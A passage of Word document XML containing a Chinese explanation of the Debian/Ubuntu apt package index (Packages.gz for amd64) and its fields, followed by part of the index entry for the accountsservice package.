    <w:p w14:paraId="4BB3C377" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>系统会根据自己的平台下载相应的包索引，本平台为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>amd64</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，所以访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>main/binary-amd64/Packages.gz</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>下列出的是其中的一部分，索引中包含如下信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>包名，优先级，类型，维护者，架构，源文件（</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>），版本号，依赖包，冲突性信息，包大小，文件的下载路径，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>MD5sum</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>SHA1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，包描述，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Xul-Appid—</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>应用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Bugs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>信息，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Origin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E913C" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F67EF1" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Package: accountsservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370BCB8" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Architecture: amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67049829" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Version: 22.07.5-2ubuntu1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E5B60" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Priority: optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77143CBA" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Section: gnome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6A9704" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Origin: Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A306093" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintainer: Ubuntu Developers </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ubuntu-devel-discuss@lists.ubuntu.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5C55C" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Original-Maintainer: Debian freedesktop.org maintainers </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>pkg-freedesktop-maintainers@lists.alioth.debian.org</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA15215" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bugs: https://bugs.launchpad.net/ubuntu/+filebug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D6CC9D" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Installed-Size: 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59748CD5" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Depends: dbus </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.9.18</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, libaccountsservice0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 22.07.5-2ubuntu1.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, libc6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.34</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, libglib2.0-0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
